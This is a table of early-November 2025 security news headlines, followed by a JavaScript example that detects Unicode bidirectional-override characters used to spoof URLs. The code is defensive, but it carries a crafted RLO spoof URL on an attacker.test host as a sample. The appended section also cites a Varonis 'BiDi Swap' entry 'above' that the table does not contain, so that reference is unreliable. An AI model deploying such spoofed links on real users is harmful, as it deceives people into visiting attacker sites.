| 1.11.25 | Cybersecurity on a budget: Strategies for an economic downturn | This blog offers practical strategies, creative defenses, and talent management advice to help your business stay secure when every dollar counts. | Cyber blog | CISCO TALOS |
| 1.11.25 | Trick, treat, repeat | Thor gets into the Halloween spirit, sharing new CVE trends, a “treat” for European Windows 10 users, and a reminder that patching is your best defense against zombie vulnerabilities. | Vulnerability blog | CISCO TALOS |
| 1.11.25 | Dynamic binary instrumentation (DBI) with DynamoRio | Learn how to build your own dynamic binary instrumentation (DBI) tool with open-source DynamoRIO to enable malware analysis, security auditing, reverse engineering, and more. | Cyber blog | CISCO TALOS |
| 1.11.25 | Uncovering Qilin attack methods exposed through multiple cases | Cisco Talos investigated the Qilin ransomware group, uncovering its frequent attacks on the manufacturing sector, use of legitimate tools for credential theft and data exfiltration, and sophisticated methods for lateral movement, evasion, and persistence. | Ransom blog | CISCO TALOS |
| 1.11.25 | Think passwordless is too complicated? Let's clear that up | We’ve relied on passwords for years to protect our online accounts, but they’ve also become one of the easiest ways attackers get in. Cisco Duo helps clear up some of the biggest passwordless myths. | Cyber blog | CISCO TALOS |
| 1.11.25 | Strings in the maze: Finding hidden strengths and gaps in your team | In this week’s newsletter, Bill explores how open communication about your skills and experience can help your security team uncover hidden gaps, strengthen your defenses, and better prepare for ever-present threats. | Cyber blog | CISCO TALOS |
| 1.11.25 | This month in security with Tony Anscombe – October 2025 edition | From the end of Windows 10 support to scams on TikTok and state-aligned hackers wielding AI, October's headlines offer a glimpse of what's shaping cybersecurity right now | Social blog | Eset |
| 1.11.25 | Fraud prevention: How to help older family members avoid scams | Families that combine open communication with effective behavioral and technical safeguards can cut the risk dramatically | Spam blog | Eset |
| 1.11.25 | Cybersecurity Awareness Month 2025: When seeing isn't believing | Deepfakes are blurring the line between real and fake and fraudsters are cashing in, using synthetic media for all manner of scams | Security blog | Eset |
| 1.11.25 | Recruitment red flags: Can you spot a spy posing as a job seeker? | | Security blog | Eset |
| 1.11.25 | How MDR can give MSPs the edge in a competitive market | With cybersecurity talent in short supply and threats evolving fast, managed detection and response is emerging as a strategic necessity for MSPs | Security blog | Eset |
| 1.11.25 | From Scripts to Systems: A Comprehensive Look at Tangerine Turkey Operations | This Threat Analysis Report investigates the flow of a Tangerine Turkey campaign | Hacking blog | Cybereason |
| 1.11.25 | The Bug Report - October 2025 Edition | October's cybersecurity horror show is here! Zero-days in WSUS (CVE-2025-59287) and SessionReaper (Adobe) are under active attack. Patch these RCE and LPE monsters now or risk full possession of your network. | Vulnerability blog | Trellix |
| 1.11.25 | OpenAI Unveils Aardvark: GPT-5 Agent That Finds and Fixes Code Flaws Automatically | OpenAI has announced the launch of an "agentic security researcher" that's powered by its GPT-5 large language model (LLM) and is programmed to emulate a human expert capable | AI | |
| 1.11.25 | Nation-State Hackers Deploy New Airstalk Malware in Suspected Supply Chain Attack | A suspected nation-state threat actor has been linked to the distribution of a new malware called Airstalk as part of a likely supply chain attack. Palo Alto Networks Unit 42 said it's | Virus | The Hacker News |
| 1.11.25 | China-Linked Hackers Exploit Windows Shortcut Flaw to Target European Diplomats | A China-affiliated threat actor known as UNC6384 has been linked to a fresh set of attacks exploiting an unpatched Windows shortcut vulnerability to target European diplomatic and | Exploit | The Hacker News |
| 1.11.25 | China-Linked Tick Group Exploits Lanscope Zero-Day to Hijack Corporate Systems | The exploitation of a recently disclosed critical security flaw in Motex Lanscope Endpoint Manager has been attributed to a cyber espionage group known as Tick . The vulnerability, | Exploit | The Hacker News |
| 1.11.25 | CISA and NSA Issue Urgent Guidance to Secure WSUS and Microsoft Exchange Servers | The U.S. Cybersecurity and Infrastructure Security Agency (CISA) and National Security Agency (NSA), along with international partners from Australia and Canada, have released | Exploit | |
| 1.11.25 | Eclipse Foundation Revokes Leaked Open VSX Tokens Following Wiz Discovery | Eclipse Foundation, which maintains the open-source Open VSX project, said it has taken steps to revoke a small number of tokens that were leaked within Visual Studio Code (VS | Vulnerability | |
| 1.11.25 | CISA Flags VMware Zero-Day Exploited by China-Linked Hackers in Active Attacks | The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday added a high-severity security flaw impacting Broadcom VMware Tools and VMware Aria Operations to its | Exploit | The Hacker News |
| 1.11.25 | A New Security Layer for macOS Takes Aim at Admin Errors Before Hackers Do | A design firm is editing a new campaign video on a MacBook Pro. The creative director opens a collaboration app that quietly requests microphone and camera permissions. | Security | The Hacker News |
| 1.11.25 | Google's Built-In AI Defenses on Android Now Block 10 Billion Scam Messages a Month | Google on Thursday revealed that the scam defenses built into Android safeguard users around the world from more than 10 billion suspected malicious calls and messages every | AI | |
| 1.11.25 | Russian Ransomware Gangs Weaponize Open-Source AdaptixC2 for Advanced Attacks | The open-source command-and-control (C2) framework known as AdaptixC2 is being used by a growing number of threat actors, some of whom are related to Russian ransomware | Ransom | The Hacker News |
| 1.11.25 | New "Brash" Exploit Crashes Chromium Browsers Instantly with a Single Malicious URL | A severe vulnerability disclosed in Chromium's Blink rendering engine can be exploited to crash many Chromium-based browsers within a few seconds. Security researcher Jose Pino, | Exploit | The Hacker News |
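The "BiDi Swap" entry above (Varonis, 1.11.25) describes fake URLs that render convincingly because of Unicode bidirectional text. As an added example, not code from Varonis or from the original page, the JavaScript below flags explicit bidi control characters in a URL, returns the logical string (what a browser actually requests) and an approximate rendered form, so an analyst or a URL filter can see where the two diverge. The sample URL is constructed for the demo; the rendering helper only handles the common RLO ... PDF case and is an approximation, not an implementation of the full Unicode bidi algorithm.

```javascript
// Added example: detect Unicode bidirectional controls hidden in a URL.
// Assumption: the attacker relies on explicit bidi controls (overrides,
// embeddings, isolates, or LRM/RLM marks) to make the displayed string
// differ from the logical one. All of these are BMP code points.
const BIDI_NAMES = {
  0x061C: "ALM", 0x200E: "LRM", 0x200F: "RLM",
  0x202A: "LRE", 0x202B: "RLE", 0x202C: "PDF", 0x202D: "LRO", 0x202E: "RLO",
  0x2066: "LRI", 0x2067: "RLI", 0x2068: "FSI", 0x2069: "PDI",
};
const BIDI_RE = /[\u061C\u200E\u200F\u202A-\u202E\u2066-\u2069]/g;

// Every bidi control in the string, with its position, code point and name.
function findBidiControls(url) {
  const hits = [];
  for (let i = 0; i < url.length; i++) {
    const cp = url.charCodeAt(i);
    if (BIDI_NAMES[cp] !== undefined) {
      hits.push({
        index: i,
        codePoint: "U+" + cp.toString(16).toUpperCase().padStart(4, "0"),
        name: BIDI_NAMES[cp],
      });
    }
  }
  return hits;
}

// The logical form: controls stripped, which is the URL that is really fetched.
function logicalForm(url) {
  return url.replace(BIDI_RE, "");
}

// Approximate visual form for the RLO trick: text between an RLO (U+202E) and
// the next PDF (U+202C), or the end of the string, is shown reversed. Other
// controls are invisible and are dropped. This is an approximation only.
function approximateVisualForm(url) {
  let out = "";
  let i = 0;
  while (i < url.length) {
    const ch = url[i];
    if (ch === "\u202E") {
      let end = url.indexOf("\u202C", i + 1);
      if (end === -1) end = url.length;
      out += url.slice(i + 1, end).split("").reverse().join("");
      i = end + 1;
    } else if (BIDI_NAMES[ch.charCodeAt(0)] !== undefined) {
      i++;
    } else {
      out += ch;
      i++;
    }
  }
  return out;
}

// Verdict object a filter or analyst tooling can act on.
function assessUrl(url) {
  const controls = findBidiControls(url);
  return {
    suspicious: controls.length > 0,
    controls,
    logical: logicalForm(url),
    visual: approximateVisualForm(url),
  };
}

// Constructed sample: an RLO after the path separator makes the reversed
// text "moc.elpmaxe.nigol" display as "login.example.com".
const SAMPLE = "https://attacker.test/\u202Emoc.elpmaxe.nigol";

console.log(assessUrl(SAMPLE));
console.log(assessUrl("https://login.example.com/"));
```

In a proxy or mail gateway the cheap rule is to reject or flag any URL where `findBidiControls` returns a non-empty list; legitimate URLs have no reason to carry bidi overrides, and the `logical` field is what to log and block on, never the displayed text.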